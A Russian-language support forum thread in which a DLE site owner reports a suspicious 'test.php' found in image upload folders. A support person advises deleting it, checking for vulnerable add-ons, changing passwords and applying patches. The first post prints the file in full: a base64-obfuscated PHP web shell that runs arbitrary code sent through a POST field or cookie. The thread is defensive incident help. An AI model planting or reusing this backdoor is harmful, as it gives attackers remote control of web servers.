alleclf 6 Опубликовано: 22 декабря 2014 Рассказать Опубликовано: 22 декабря 2014 (изменено) Обнаружил на сайте подозрительный php-файл. Находился в двух папках "uploadsposts2014-03" и "2014-05". Вот сам файл "test.php": <?php /*c98a03cd2172e85bf13c4a5e87e5e49e*/ eval(base64_decode("JHAgID0gICAnaic7OyA7IDsgICAgICBpZiAgICAgKCAgICBpc3NldCgg ICAgICRfQ09PS0lFWydkd2MnXSkgICAgKSAgeyAgICAgZWNobyAgICAnPGN3ZD4nICAgIC4gIGdldG N3ZCgpICAuICAgICc8L2N3ZD4nOzsgOyAgICAgfSAgIGlmICAgICAoICAgIGlzc2V0ICAgICAoICAkX1B PU1RbJ3BjOTgnXSAgICAgKSAgICkgICAgeyAgICBldmFsICAgICggICAgYmFzZTY0X2RlY29kZSAgK CAgICRfUE9TVFsncGM5OCddICAgICApICAgICApOzsgOyAgIHJldHVybjs7IDsgICAgIH0gICAgaWYgI CAoICAgIGlzc2V0KCAgICAkX0NPT0tJRVsncGM5OCddKSAgKSAgICB7ICAgZXZhbCAgICAoICAgIC BiYXNlNjRfZGVjb2RlICAgICAoICAkX0NPT0tJRVsncGM5OCddICAgKSAgKTs7IDsgOyAgICAgIHJldHVybjs7ICAgfSAg")); ?>* я добавил несколько сносок, так как текст файла вылазит далеко за страницу вправо. Я немного изменяю дизайн и поправляю размер картинок. Что бы не возиться через админку я просто скачиваю все необходимые файлы на комп и изменяю в программе ACDSee. Изменение заключается в увеличении размера картинки, немного, на 20-50 пх. На качество изображения это не особо влияет. Так вот, именно в папке "2014-03" там где я нашел подозрительный файл, на 3 картинках при изменении в программе ACDSee выскочило сообщение о какой-то ошибке, то-ли формата, то-ли атрибута. К сожалению точной формулировки не помню. Но, картинка изменилась в размере и при повторном редактировании уже ничего не выскакивает. Может у меня и картинки заражены? Есть какой-то инструмент для проверки? Желательно локально, хотя можно и в он-лайн прогнать. По сайту ничего не замечаю, вроде всё работает как надо. Изменено 22 декабря 2014 пользователем alleclf Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 22 декабря 2014 Рассказать Опубликовано: 22 декабря 2014 alleclf, Никаких PHP файлов в этих папках быть не должно. Залить их через DLE также не возможно. У вас есть уязвимости на вашем сервере, например другие скрипты или сторонние модификации, или уязвимости в серверном ПО. Злоумышленникам их удалось залить, но видимо из за того что запуск скриптов в этих папках запрещен в DLE, их не смогли запустить и навредить дальше. Их нужно обязательно удалять. И проверять свой сервер, удалять все посторонние скрипты и модификации, восстановив оригинальные файлы DLE. А также сменить все пароли к серверу и скрипту DLE Цитата Ссылка на сообщение Поделиться на других сайтах
alleclf 6 Опубликовано: 22 декабря 2014 Рассказать Опубликовано: 22 декабря 2014 Автор celsoft, я проверил все файлы движка, из сторонних модулей только BlockPro, партнерка от Loadpays и кнопки соц.сетей Share42. Сейчас на сервере нет ничего лишнего и подозрительного. Остался вопрос с картинками, как их проверить? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 22 декабря 2014 Рассказать Опубликовано: 22 декабря 2014 Остался вопрос с картинками, как их проверить? Файлы имеющие расширения картинок, не могут выполняться как скрипты, если в папках оригинальные файлы .htaccess, поэтому какой либо особой проверки для них делать не нужно. Кстати я забыл написать. Вы пользуетесь актуальной версией скрипта или устаревшими? Если старыми версиями скрипта, то незабудьте проверить что вы установили все необходимые патчи безопасности http://dle-news.ru/bags/ Цитата Ссылка на сообщение Поделиться на других сайтах
alleclf 6 Опубликовано: 23 декабря 2014 Рассказать Опубликовано: 23 декабря 2014 Автор Кстати я забыл написать. Вы пользуетесь актуальной версией скрипта или устаревшими? Если старыми версиями скрипта, то незабудьте проверить что вы установили все необходимые патчи безопасности http://dle-news.ru/bags/ Остановился на 9.8, пока нет возможности продлить. Все патчи установлены, хотя проверю, может что-то пропустил. Спасибо. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.